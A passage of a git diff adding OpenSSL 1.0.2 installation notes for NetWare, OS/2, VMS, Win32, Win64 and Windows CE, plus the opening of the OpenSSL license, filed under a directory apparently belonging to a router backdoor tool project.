+globals it would require substantial code changes and it wasn't done.  Hence,
+the build currently only builds static libraries which are then linked
+into each application.
+
+NOTE:  If you are building a library NLM that uses the OpenSSL static
+libraries, you will still have to deal with the global variable issue.
+This is because when you link in the OpenSSL code you bring in all the
+globals.  One possible solution for the global pointer variables is to
+register memory functions with OpenSSL which allocate memory and charge it
+to your library NLM (see the function CRYPTO_set_mem_functions).  However,
+be aware that now all memory allocated by OpenSSL is charged to your NLM.
+
+
+CodeWarrior Tools and W2K
+---------------------------
+There have been problems reported with the CodeWarrior Linker
+(mwldnlm.exe) in the PDK 2.1 for NetWare when running on Windows 2000.  The
+problems cause the link step to fail.  The only work around is to obtain an
+updated linker from Metrowerks.  It is expected Metrowerks will release
+PDK 3.0 (in beta testing at this time - May, 2001) in the near future which
+will fix these problems.
+
+
+Makefile "vclean"
+------------------
+The generated makefile has a "vclean" target which cleans up the build
+directories.  If you have been building successfully and suddenly
+experience problems, use "vclean" (gmake -f netware\nlm_xxxx.mak vclean) and retry.
+
+
+"Undefined Symbol" Linker errors
+--------------------------------
+There have been linker errors reported when doing a CLIB build.  The problems
+occur because some versions of the CLIB SDK import files inadvertently 
+left out some symbols.  One symbol in particular is "_lrotl".  The missing
+functions are actually delivered in the binaries, but they were left out of
+the import files.  The issues should be fixed in the September 2001 release 
+of the NDK.  If you experience the problems you can temporarily
+work around it by manually adding the missing symbols to your version of 
+"clib.imp".
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.OS2 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.OS2
new file mode 100644
index 0000000..530316d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.OS2
@@ -0,0 +1,31 @@
+ 
+ Installation on OS/2
+ --------------------
+
+ You need to have the following tools installed:
+
+  * EMX GCC
+  * PERL
+  * GNU make
+
+
+ To build the makefile, run
+
+ > os2\os2-emx
+
+ This will configure OpenSSL and create OS2-EMX.mak which you then use to 
+ build the OpenSSL libraries & programs by running
+
+ > make -f os2-emx.mak
+
+ If that finishes successfully you will find the libraries and programs in the
+ "out" directory.
+
+ Alternatively, you can make a dynamic build that puts the library code into
+ crypto.dll and ssl.dll by running
+
+ > make -f os2-emx-dll.mak
+
+ This will build the above mentioned dlls and a matching pair of import
+ libraries in the "out_dll" directory along with the set of test programs
+ and the openssl application.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.VMS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.VMS
new file mode 100644
index 0000000..e5d43a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.VMS
@@ -0,0 +1,293 @@
+			VMS Installation instructions
+			written by Richard Levitte
+			<richard@levitte.org>
+
+
+Intro:
+======
+
+This file is divided in the following parts:
+
+  Requirements			- Mandatory reading.
+  Checking the distribution	- Mandatory reading.
+  Compilation			- Mandatory reading.
+  Logical names			- Mandatory reading.
+  Test				- Mandatory reading.
+  Installation			- Mandatory reading.
+  Backward portability		- Read if it's an issue.
+  Possible bugs or quirks	- A few warnings on things that
+				  may go wrong or may surprise you.
+  TODO				- Things that are to come.
+
+
+Requirements:
+=============
+
+To build and install OpenSSL, you will need:
+
+ * DEC C or some other ANSI C compiler.  VAX C is *not* supported.
+   [Note: OpenSSL has only been tested with DEC C.  Compiling with 
+    a different ANSI C compiler may require some work]
+
+Checking the distribution:
+==========================
+
+There have been reports of places where the distribution didn't quite get
+through, for example if you've copied the tree from a NFS-mounted Unix
+mount point.
+
+The easiest way to check if everything got through as it should is to check
+for one of the following files:
+
+	[.CRYPTO]OPENSSLCONF.H_IN
+	[.CRYPTO]OPENSSLCONF_H.IN
+
+They should never exist both at once, but one of them should (preferably
+the first variant).  If you can't find any of those two, something went
+wrong.
+
+The best way to get a correct distribution is to download the gzipped tar
+file from ftp://ftp.openssl.org/source/, use GUNZIP to uncompress it and
+use VMSTAR to unpack the resulting tar file.
+
+GUNZIP is available in many places on the net.  One of the distribution
+points is the WKU software archive, ftp://ftp.wku.edu/vms/fileserv/ .
+
+VMSTAR is also available in many places on the net.  The recommended place
+to find information about it is http://www.free.lp.se/vmstar/ .
+
+
+Compilation:
+============
+
+I've used the very good command procedures written by Robert Byer
+<byer@mail.all-net.net>, and just slightly modified them, making
+them slightly more general and easier to maintain.
+
+You can actually compile in almost any directory separately.  Look
+for a command procedure name xxx-LIB.COM (in the library directories)
+or MAKExxx.COM (in the program directories) and read the comments at
+the top to understand how to use them.  However, if you want to
+compile all you can get, the simplest is to use MAKEVMS.COM in the top
+directory.  The syntax is the following:
+
+  @MAKEVMS <option> <bits> <debug-p> [<compiler>]
+
+<option> must be one of the following:
+
+      ALL       Just build "everything".
+      CONFIG    Just build the "[.CRYPTO]OPENSSLCONF.H" file.
+      BUILDINF  Just build the "[.INCLUDE]BUILDINF.H" file.
+      SOFTLINKS Just copies some files, to simulate Unix soft links.
+      BUILDALL  Same as ALL, except CONFIG, BUILDINF and SOFTLINKS aren't done.
+      RSAREF    Just build the "[.xxx.EXE.RSAREF]LIBRSAGLUE.OLB" library.
+      CRYPTO    Just build the "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB" library.
+      SSL       Just build the "[.xxx.EXE.SSL]LIBSSL.OLB" library.
+      SSL_TASK  Just build the "[.xxx.EXE.SSL]SSL_TASK.EXE" program.
+      TEST      Just build the "[.xxx.EXE.TEST]" test programs for OpenSSL.
+      APPS      Just build the "[.xxx.EXE.APPS]" application programs for OpenSSL.
+
+<bits> must be one of the following:
+
+      ""        compile using default pointer size
+      32        compile using 32 bit pointer size
+      64        compile using 64 bit pointer size
+
+<debug-p> must be one of the following:
+
+      DEBUG     compile with debugging info (will not optimize)
+      NODEBUG   compile without debugging info (will optimize)
+
+<compiler> must be one of the following:
+
+      DECC      For DEC C.
+      GNUC      For GNU C.
+
+
+You will find the crypto library in [.xxx.EXE.CRYPTO] (where xxx is VAX,
+ALPHA or IA64), called SSL_LIBCRYPTO32.OLB or SSL_LIBCRYPTO.OLB depending
+on how it was built.  You will find the SSL library in [.xxx.EXE.SSL],
+named SSL_LIBSSL32.OLB or SSL_LIBSSL.OLB, and you will find a bunch of
+useful programs in [.xxx.EXE.APPS].  However, these shouldn't be used
+right off unless it's just to test them.  For production use, make sure
+you install first, see Installation below.
+
+Note 1: Some programs in this package require a TCP/IP library.
+
+Note 2: if you want to compile the crypto library only, please make sure
+        you have at least done a @MAKEVMS CONFIG, a @MAKEVMS BUILDINF and
+        a @MAKEVMS SOFTLINKS.  A lot of things will break if you don't.
+
+
+Logical names:
+==============
+
+There are a few things that can't currently be given through the command
+line.  Instead, logical names are used.
+
+Currently, the logical names supported are:
+
+      OPENSSL_NO_ASM    with value YES, the assembler parts of OpenSSL will
+                        not be used.  Instead, plain C implementations are
+                        used.  This is good to try if something doesn't work.
+      OPENSSL_NO_'alg'  with value YES, the corresponding crypto algorithm
+                        will not be implemented.  Supported algorithms to
+                        do this with are: RSA, DSA, DH, MD2, MD4, MD5, RIPEMD,
+                        SHA, DES, MDC2, CR2, RC4, RC5, IDEA, BF, CAST, HMAC,
+                        SSL2.  So, for example, having the logical name
+                        OPENSSL_NO_RSA with the value YES means that the
+                        LIBCRYPTO.OLB library will not contain an RSA
+                        implementation.
+
+
+Test:
+=====
+
+Testing is very simple, just do the following:
+
+  @[.TEST]TESTS
+
+If a test fails, try with defining the logical name OPENSSL_NO_ASM (yes,
+it's an ugly hack!) and rebuild. Please send a bug report to
+<openssl-bugs@openssl.org>, including the output of "openssl version -a"
+and of the failed test.
+
+
+Installation:
+=============
+
+Installation is easy, just do the following:
+
+  @INSTALL <root> <bits>
+
+<root> is the directory in which everything will be installed,
+subdirectories, libraries, header files, programs and startup command
+procedures.
+
+<bits> works the same way as for MAKEVMS.COM
+
+N.B.: INSTALL.COM builds a new directory structure, different from
+the directory tree where you have now build OpenSSL.
+
+In the [.VMS] subdirectory of the installation, you will find the
+following command procedures:
+
+  OPENSSL_STARTUP.COM
+
+        defines all needed logical names.  Takes one argument that
+        tells it in what logical name table to insert the logical
+        names.  If you insert if it SYS$MANAGER:SYSTARTUP_VMS.COM, the
+        call should look like this: 
+
+          @openssldev:[openssldir.VMS]OPENSSL_STARTUP "/SYSTEM"
+
+  OPENSSL_UTILS.COM
+
+        sets up the symbols to the applications.  Should be called
+        from for example SYS$MANAGER:SYLOGIN.COM 
+
+  OPENSSL_UNDO.COM
+
+	deassigns the logical names created with OPENSSL_STARTUP.COM.
+
+The logical names that are set up are the following:
+
+  SSLROOT       a dotted concealed logical name pointing at the
+                root directory.
+
+  SSLCERTS      Initially an empty directory, this is the default
+		location for certificate files.
+  SSLPRIVATE	Initially an empty directory, this is the default
+		location for private key files.
+
+  SSLEXE        Contains the openssl binary and a few other utility
+		programs.
+  SSLINCLUDE    Contains the header files needed if you want to
+		compile programs with libcrypto or libssl.
+  SSLLIB        Contains the OpenSSL library files themselves:
+  		- SSL_LIBCRYPTO32.OLB and SSL_LIBSSL32.OLB or
+		- SSL_LIBCRYPTO.OLB and SSL_LIBSSL.OLB
+
+  OPENSSL	Same as SSLINCLUDE.  This is because the standard
+		way to include OpenSSL header files from version
+		0.9.3 and on is:
+
+			#include <openssl/header.h>
+
+		For more info on this issue, see the INSTALL. file
+		(the NOTE in section 4 of "Installation in Detail").
+		You don't need to "deleting old header files"!!!
+
+
+Backward portability:
+=====================
+
+One great problem when you build a library is making sure it will work
+on as many versions of VMS as possible.  Especially, code compiled on
+OpenVMS version 7.x and above tend to be unusable in version 6.x or
+lower, because some C library routines have changed names internally
+(the C programmer won't usually see it, because the old name is
+maintained through C macros).  One obvious solution is to make sure
+you have a development machine with an old enough version of OpenVMS.
+However, if you are stuck with a bunch of Alphas running OpenVMS version
+7.1, you seem to be out of luck.  Fortunately, the DEC C header files
+are cluttered with conditionals that make some declarations and definitions
+dependent on the OpenVMS version or the C library version, *and* you
+can use those macros to simulate older OpenVMS or C library versions,
+by defining the macros _VMS_V6_SOURCE, __VMS_VER and __CTRL_VER with
+correct values.  In the compilation scripts, I've provided the possibility
+for the user to influence the creation of such macros, through a bunch of
+symbols, all having names starting with USER_.  Here's the list of them:
+
+  USER_CCFLAGS		 - Used to give additional qualifiers to the
+			   compiler.  It can't be used to define macros
+			   since the scripts will do such things as well.
+			   To do such things, use USER_CCDEFS.
+  USER_CCDEFS		 - Used to define macros on the command line.  The
+			   value of this symbol will be inserted inside a
+			   /DEFINE=(...).
+  USER_CCDISABLEWARNINGS - Used to disable some warnings.  The value is
+			   inserted inside a /DISABLE=WARNING=(...).
+
+So, to maintain backward compatibility with older VMS versions, do the
+following before you start compiling:
+
+  $ USER_CCDEFS := _VMS_V6_SOURCE=1,__VMS_VER=60000000,__CRTL_VER=60000000
+  $ USER_CCDISABLEWARNINGS := PREOPTW
+
+The USER_CCDISABLEWARNINGS is there because otherwise, DEC C will complain
+that those macros have been changed.
+
+Note: Currently, this is only useful for library compilation.  The
+      programs will still be linked with the current version of the
+      C library shareable image, and will thus complain if they are
+      faced with an older version of the same C library shareable image.
+      This will probably be fixed in a future revision of OpenSSL.
+
+
+Possible bugs or quirks:
+========================
+
+I'm not perfectly sure all the programs will use the SSLCERTS:
+directory by default, it may very well be that you have to give them
+extra arguments.  Please experiment.
+
+
+TODO:
+=====
+
+There are a few things that need to be worked out in the VMS version of
+OpenSSL, still:
+
+- Description files. ("Makefile's" :-))
+- Script code to link an already compiled build tree.
+- A VMSINSTALlable version (way in the future, unless someone else hacks).
+- shareable images (DLL for you Windows folks).
+
+There may be other things that I have missed and that may be desirable.
+Please send mail to <openssl-users@openssl.org> or to me directly if you
+have any ideas.
+
+--
+Richard Levitte <richard@levitte.org>
+2000-02-27, 2011-03-18
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W32 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W32
new file mode 100644
index 0000000..80e5382
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W32
@@ -0,0 +1,325 @@
+ 
+ INSTALLATION ON THE WIN32 PLATFORM
+ ----------------------------------
+
+ [Instructions for building for Windows CE can be found in INSTALL.WCE]
+ [Instructions for building for Win64 can be found in INSTALL.W64]
+
+ Here are a few comments about building OpenSSL for Win32 environments,
+ such as Windows NT and Windows 9x. It should be noted though that
+ Windows 9x are not ordinarily tested. Its mention merely means that we
+ attempt to maintain certain programming discipline and pay attention
+ to backward compatibility issues, in other words it's kind of expected
+ to work on Windows 9x, but no regression tests are actually performed.
+
+ On additional note newer OpenSSL versions are compiled and linked with
+ Winsock 2. This means that minimum OS requirement was elevated to NT 4
+ and Windows 98 [there is Winsock 2 update for Windows 95 though].
+
+ - you need Perl for Win32.  Unless you will build on Cygwin, you will need
+   ActiveState Perl, available from http://www.activestate.com/ActivePerl.
+
+ - one of the following C compilers:
+
+  * Visual C++
+  * Borland C
+  * GNU C (Cygwin or MinGW)
+
+- Netwide Assembler, a.k.a. NASM, available from http://nasm.sourceforge.net/
+  is required if you intend to utilize assembler modules. Note that NASM
+  is now the only supported assembler.
+
+ If you are compiling from a tarball or a Git snapshot then the Win32 files
+ may well be not up to date. This may mean that some "tweaking" is required to
+ get it all to work. See the trouble shooting section later on for if (when?)
+ it goes wrong.
+
+ Visual C++
+ ----------
+
+ If you want to compile in the assembly language routines with Visual
+ C++, then you will need already mentioned Netwide Assembler binary,
+ nasmw.exe or nasm.exe, to be available on your %PATH%.
+
+ Firstly you should run Configure with platform VC-WIN32:
+
+ > perl Configure VC-WIN32 --prefix=c:\some\openssl\dir
+
+ Where the prefix argument specifies where OpenSSL will be installed to.
+
+ Next you need to build the Makefiles and optionally the assembly
+ language files:
+
+ - If you are using NASM then run:
+
+   > ms\do_nasm
+
+ - If you don't want to use the assembly language files at all then run:
+
+   > perl Configure VC-WIN32 no-asm --prefix=c:/some/openssl/dir
+   > ms\do_ms
+
+ If you get errors about things not having numbers assigned then check the
+ troubleshooting section: you probably won't be able to compile it as it
+ stands.
+
+ Then from the VC++ environment at a prompt do:
+
+ > nmake -f ms\ntdll.mak
+
+ If all is well it should compile and you will have some DLLs and
+ executables in out32dll. If you want to try the tests then do:
+ 
+ > nmake -f ms\ntdll.mak test
+
+
+ To install OpenSSL to the specified location do:
+
+ > nmake -f ms\ntdll.mak install
+
+ Tweaks:
+
+ There are various changes you can make to the Win32 compile
+ environment. By default the library is not compiled with debugging
+ symbols. If you use the platform debug-VC-WIN32 instead of VC-WIN32
+ then debugging symbols will be compiled in.
+
+ By default in 1.0.0 OpenSSL will compile builtin ENGINES into the
+ separate shared librariesy. If you specify the "enable-static-engine"
+ option on the command line to Configure the shared library build
+ (ms\ntdll.mak) will compile the engines into libeay32.dll instead.
+
+ The default Win32 environment is to leave out any Windows NT specific
+ features.
+
+ If you want to enable the NT specific features of OpenSSL (currently
+ only the logging BIO) follow the instructions above but call the batch
+ file do_nt.bat instead of do_ms.bat.
+
+ You can also build a static version of the library using the Makefile
+ ms\nt.mak
+
+
+ Borland C++ builder 5
+ ---------------------
+
+ * Configure for building with Borland Builder:
+   > perl Configure BC-32
+
+ * Create the appropriate makefile
+   > ms\do_nasm
+
+ * Build
+   > make -f ms\bcb.mak
+
+ Borland C++ builder 3 and 4
+ ---------------------------
+
+ * Setup PATH. First must be GNU make then bcb4/bin 
+
+ * Run ms\bcb4.bat
+
+ * Run make:
+   > make -f bcb.mak
+
+ GNU C (Cygwin)
+ --------------
+
+ Cygwin implements a Posix/Unix runtime system (cygwin1.dll) on top of
+ Win32 subsystem and provides a bash shell and GNU tools environment.
+ Consequently, a make of OpenSSL with Cygwin is virtually identical to
+ Unix procedure. It is also possible to create Win32 binaries that only
+ use the Microsoft C runtime system (msvcrt.dll or crtdll.dll) using
+ MinGW. MinGW can be used in the Cygwin development environment or in a
+ standalone setup as described in the following section.
+
+ To build OpenSSL using Cygwin:
+
+ * Install Cygwin (see http://cygwin.com/)
+
+ * Install Perl and ensure it is in the path. Both Cygwin perl
+   (5.6.1-2 or newer) and ActivePerl work.
+
+ * Run the Cygwin bash shell
+
+ * $ tar zxvf openssl-x.x.x.tar.gz
+   $ cd openssl-x.x.x
+
+   To build the Cygwin version of OpenSSL:
+
+   $ ./config
+   [...]
+   $ make
+   [...]
+   $ make test
+   $ make install
+
+   This will create a default install in /usr/local/ssl.
+
+   To build the MinGW version (native Windows) in Cygwin:
+
+   $ ./Configure mingw
+   [...]
+   $ make
+   [...]
+   $ make test
+   $ make install
+
+ Cygwin Notes:
+
+ "make test" and normal file operations may fail in directories
+ mounted as text (i.e. mount -t c:\somewhere /home) due to Cygwin
+ stripping of carriage returns. To avoid this ensure that a binary
+ mount is used, e.g. mount -b c:\somewhere /home.
+
+ "bc" is not provided in older Cygwin distribution.  This causes a
+ non-fatal error in "make test" but is otherwise harmless.  If
+ desired and needed, GNU bc can be built with Cygwin without change.
+
+ GNU C (MinGW/MSYS)
+ -------------
+
+ * Compiler and shell environment installation:
+
+   MinGW and MSYS are available from http://www.mingw.org/, both are
+   required. Run the installers and do whatever magic they say it takes
+   to start MSYS bash shell with GNU tools on its PATH.
+
+   N.B. Since source tar-ball can contain symbolic links, it's essential
+   that you use accompanying MSYS tar to unpack the source. It will
+   either handle them in one way or another or fail to extract them,
+   which does the trick too. Latter means that you may safely ignore all
+   "cannot create symlink" messages, as they will be "re-created" at
+   configure stage by copying corresponding files. Alternative programs
+   were observed to create empty files instead, which results in build
+   failure.
+
+ * Compile OpenSSL:
+
+   $ ./config
+   [...]
+   $ make
+   [...]
+   $ make test
+
+   This will create the library and binaries in root source directory
+   and openssl.exe application in apps directory.
+
+   It is also possible to cross-compile it on Linux by configuring
+   with './Configure --cross-compile-prefix=i386-mingw32- mingw ...'.
+   'make test' is naturally not applicable then.
+
+   libcrypto.a and libssl.a are the static libraries. To use the DLLs,
+   link with libeay32.a and libssl32.a instead.
+
+   See troubleshooting if you get error messages about functions not
+   having a number assigned.
+
+ Installation
+ ------------
+
+ If you used the Cygwin procedure above, you have already installed and
+ can skip this section.  For all other procedures, there's currently no real
+ installation procedure for Win32.  There are, however, some suggestions:
+
+    - do nothing.  The include files are found in the inc32/ subdirectory,
+      all binaries are found in out32dll/ or out32/ depending if you built
+      dynamic or static libraries.
+
+    - do as is written in INSTALL.Win32 that comes with modssl:
+
+	$ md c:\openssl 
+	$ md c:\openssl\bin
+	$ md c:\openssl\lib
+	$ md c:\openssl\include
+	$ md c:\openssl\include\openssl
+	$ copy /b inc32\openssl\*       c:\openssl\include\openssl
+	$ copy /b out32dll\ssleay32.lib c:\openssl\lib
+	$ copy /b out32dll\libeay32.lib c:\openssl\lib
+	$ copy /b out32dll\ssleay32.dll c:\openssl\bin
+	$ copy /b out32dll\libeay32.dll c:\openssl\bin
+	$ copy /b out32dll\openssl.exe  c:\openssl\bin
+
+      Of course, you can choose another device than c:.  C: is used here
+      because that's usually the first (and often only) harddisk device.
+      Note: in the modssl INSTALL.Win32, p: is used rather than c:.
+
+
+ Troubleshooting
+ ---------------
+
+ Since the Win32 build is only occasionally tested it may not always compile
+ cleanly.  If you get an error about functions not having numbers assigned
+ when you run ms\do_ms then this means the Win32 ordinal files are not up to
+ date. You can do:
+
+ > perl util\mkdef.pl crypto ssl update
+
+ then ms\do_XXX should not give a warning any more. However the numbers that
+ get assigned by this technique may not match those that eventually get
+ assigned in the Git tree: so anything linked against this version of the
+ library may need to be recompiled.
+
+ If you get errors about unresolved symbols there are several possible
+ causes.
+
+ If this happens when the DLL is being linked and you have disabled some
+ ciphers then it is possible the DEF file generator hasn't removed all
+ the disabled symbols: the easiest solution is to edit the DEF files manually
+ to delete them. The DEF files are ms\libeay32.def ms\ssleay32.def.
+
+ Another cause is if you missed or ignored the errors about missing numbers
+ mentioned above.
+
+ If you get warnings in the code then the compilation will halt.
+
+ The default Makefile for Win32 halts whenever any warnings occur. Since VC++
+ has its own ideas about warnings which don't always match up to other
+ environments this can happen. The best fix is to edit the file with the
+ warning in and fix it. Alternatively you can turn off the halt on warnings by
+ editing the CFLAG line in the Makefile and deleting the /WX option.
+
+ You might get compilation errors. Again you will have to fix these or report
+ them.
+
+ One final comment about compiling applications linked to the OpenSSL library.
+ If you don't use the multithreaded DLL runtime library (/MD option) your
+ program will almost certainly crash because malloc gets confused -- the
+ OpenSSL DLLs are statically linked to one version, the application must
+ not use a different one.  You might be able to work around such problems
+ by adding CRYPTO_malloc_init() to your program before any calls to the
+ OpenSSL libraries: This tells the OpenSSL libraries to use the same
+ malloc(), free() and realloc() as the application.  However there are many
+ standard library functions used by OpenSSL that call malloc() internally
+ (e.g. fopen()), and OpenSSL cannot change these; so in general you cannot
+ rely on CRYPTO_malloc_init() solving your problem, and you should
+ consistently use the multithreaded library.
+
+ Linking your application
+ ------------------------
+
+ If you link with static OpenSSL libraries [those built with ms/nt.mak],
+ then you're expected to additionally link your application with
+ WS2_32.LIB, ADVAPI32.LIB, GDI32.LIB and USER32.LIB. Those developing
+ non-interactive service applications might feel concerned about linking
+ with the latter two, as they are justly associated with interactive
+ desktop, which is not available to service processes. The toolkit is
+ designed to detect in which context it's currently executed, GUI,
+ console app or service, and act accordingly, namely whether or not to
+ actually make GUI calls. Additionally those who wish to
+ /DELAYLOAD:GDI32.DLL and /DELAYLOAD:USER32.DLL and actually keep them
+ off service process should consider implementing and exporting from
+ .exe image in question own _OPENSSL_isservice not relying on USER32.DLL.
+ E.g., on Windows Vista and later you could:
+
+	__declspec(dllexport) __cdecl BOOL _OPENSSL_isservice(void)
+	{   DWORD sess;
+	    if (ProcessIdToSessionId(GetCurrentProcessId(),&sess))
+	        return sess==0;
+	    return FALSE;
+	}
+
+ If you link with OpenSSL .DLLs, then you're expected to include into
+ your application code small "shim" snippet, which provides glue between
+ OpenSSL BIO layer and your compiler run-time. Look up OPENSSL_Applink
+ reference page for further details.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W64 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W64
new file mode 100644
index 0000000..9fa7a19
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W64
@@ -0,0 +1,66 @@
+
+ INSTALLATION ON THE WIN64 PLATFORM
+ ----------------------------------
+
+ Caveat lector
+ -------------
+
+ As of moment of this writing Win64 support is classified "initial"
+ for the following reasons.
+
+ - No assembler modules are engaged upon initial 0.9.8 release.
+ - API might change within 0.9.8 life-span, *but* in a manner which
+   doesn't break backward binary compatibility. Or in other words,
+   application programs compiled with initial 0.9.8 headers will
+   be expected to work with future minor release .DLL without need
+   to re-compile, even if future minor release features modified API.
+ - Above mentioned API modifications have everything to do with
+   elimination of a number of limitations, which are normally
+   considered inherent to 32-bit platforms. Which in turn is why they
+   are treated as limitations on 64-bit platform such as Win64:-)
+   The current list comprises [but not necessarily limited to]:
+
+   - null-terminated strings may not be longer than 2G-1 bytes,
+     longer strings are treated as zero-length;
+   - dynamically and *internally* allocated chunks can't be larger
+     than 2G-1 bytes;
+   - inability to encrypt/decrypt chunks of data larger than 4GB
+     [it's possibly to *hash* chunks of arbitrary size through];
+
+   Neither of these is actually big deal and hardly encountered
+   in real-life applications.
+
+ Compiling procedure
+ -------------------
+
+ You will need Perl. You can run under Cygwin or you can download
+ ActiveState Perl from http://www.activestate.com/ActivePerl.
+
+ You will need Microsoft Platform SDK, available for download at
+ http://www.microsoft.com/msdownload/platformsdk/sdkupdate/. As per
+ April 2005 Platform SDK is equipped with Win64 compilers, as well
+ as assemblers, but it might change in the future.
+
+ To build for Win64/x64:
+
+ > perl Configure VC-WIN64A
+ > ms\do_win64a
+ > nmake -f ms\ntdll.mak
+ > cd out32dll
+ > ..\ms\test
+
+ To build for Win64/IA64:
+
+ > perl Configure VC-WIN64I
+ > ms\do_win64i
+ > nmake -f ms\ntdll.mak
+ > cd out32dll
+ > ..\ms\test
+
+ Naturally test-suite itself has to be executed on the target platform.
+
+ Installation
+ ------------
+
+ TBD, for now see INSTALL.W32.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.WCE b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.WCE
new file mode 100644
index 0000000..d78c61a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.WCE
@@ -0,0 +1,95 @@
+ 
+ INSTALLATION FOR THE WINDOWS CE PLATFORM
+ ----------------------------------------
+
+ Building OpenSSL for Windows CE requires the following external tools:
+
+  * Microsoft eMbedded Visual C++ 3.0 or later
+  * Appropriate SDK might be required
+  * Perl for Win32 [commonly recommended ActiveState Perl is available
+    from http://www.activestate.com/Products/ActivePerl/]
+
+  * wcecompat compatibility library available at
+    http://www.essemer.com.au/windowsce/
+  * Optionally ceutils for running automated tests (same location)
+
+  _or_
+
+  * PocketConsole driver and PortSDK available at
+    http://www.symbolictools.de/public/pocketconsole/
+  * CMD command interpreter (same location)
+
+ As Windows CE support in OpenSSL relies on 3rd party compatibility
+ library, it's appropriate to check corresponding URL for updates. For
+ example if you choose wcecompat, note that as for the moment of this
+ writing version 1.2 is available and actually required for WCE 4.2
+ and newer platforms. All wcecompat issues should be directed to
+ www.essemer.com.au.
+
+ Why compatibility library at all? The C Runtime Library implementation
+ for Windows CE that is included with Microsoft eMbedded Visual C++ is
+ incomplete and in some places incorrect.  Compatibility library plugs
+ the holes and tries to bring the Windows CE CRT to [more] usable level.
+ Most gaping hole in CRT is support for stdin/stdout/stderr IO, which
+ proposed compatibility libraries solve in two different ways: wcecompat
+ redirects IO to active sync link, while PortSDK - to NT-like console
+ driver on the handheld itself.
+
+ Building
+ --------
+
+ Setup the eMbedded Visual C++ environment.  There are batch files for doing
+ this installed with eVC++.  For an ARM processor, for example, execute:
+
+ > "C:\Program Files\Microsoft eMbedded Tools\EVC\WCE300\BIN\WCEARM.BAT"
+
+ Next pick compatibility library according to your preferences.
+
+ 1. To choose wcecompat set up WCECOMPAT environment variable pointing
+    at the location of wcecompat tree "root":
+
+    > set WCECOMPAT=C:\wcecompat
+    > set PORTSDK_LIBPATH=
+
+ 2. To choose PortSDK set up PORTSDK_LIBPATH to point at hardware-
+    specific location where your portlib.lib is installed:
+
+    > set PORTSDK_LIBPATH=C:\PortSDK\lib\ARM
+    > set WCECOMPAT=
+
+ Note that you may not set both variables.
+
+ Next you should run Configure:
+
+ > perl Configure VC-CE
+
+ Next you need to build the Makefiles:
+
+ > ms\do_ms
+
+ If you get errors about things not having numbers assigned then check the
+ troubleshooting section in INSTALL.W32: you probably won't be able to compile
+ it as it stands.
+
+ Then from the VC++ environment at a prompt do:
+
+   > nmake -f ms\cedll.mak
+
+ [note that static builds are not supported under CE]
+
+ If all is well it should compile and you will have some DLLs and executables
+ in out32dll*. 
+
+ <<< everyting below needs revision in respect to wcecompat vs. PortSDK >>>
+
+ If you want
+ to try the tests then make sure the ceutils are in the path and do:
+ 
+ > cd out32
+ > ..\ms\testce
+
+ This will copy each of the test programs to the Windows CE device and execute
+ them, displaying the output of the tests on this computer.  The output should
+ look similar to the output produced by running the tests for a regular Windows
+ build.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/LICENSE b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/LICENSE
new file mode 100644
index 0000000..e47d101
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/LICENSE
@@ -0,0 +1,127 @@
+
+  LICENSE ISSUES
+  ==============
+
+  The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
+  the OpenSSL License and the original SSLeay license apply to the toolkit.
+  See below for the actual license texts. Actually both licenses are BSD-style
+  Open Source licenses. In case of any license issues related to OpenSSL
+  please contact openssl-core@openssl.org.
+
+  OpenSSL License
+  ---------------
+
+/* ====================================================================
+ * Copyright (c) 1998-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
